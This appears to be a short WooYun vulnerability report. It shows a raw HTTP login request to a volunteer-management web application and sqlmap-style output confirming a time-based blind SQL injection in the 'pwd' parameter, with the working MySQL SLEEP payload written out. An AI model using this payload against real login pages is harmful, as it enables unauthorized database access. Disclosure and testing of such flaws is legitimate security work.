WooYun.org

POST /xsc/volunteer/operation.do?method=login HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Cookie: JSESSIONID=1796A8F7C05B5F645A4B912AF8E86057
Referer: **.**.**.**:8080/xsc/mbzy/login1.vm
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; 2345Explorer/**.**.**.**6)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 27
Host: **.**.**.**:8080
Pragma: no-cache
stuXjh=11111111&pwd=1111111

---
Parameter: pwd (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload:  stuXjh=11111111&pwd=111111111 ' AND (SELECT * FROM (SELECT(SLEEP(5)))rqEv) AND 'iKin'='iKin
---
back-end DBMS: MySQL 5.0.11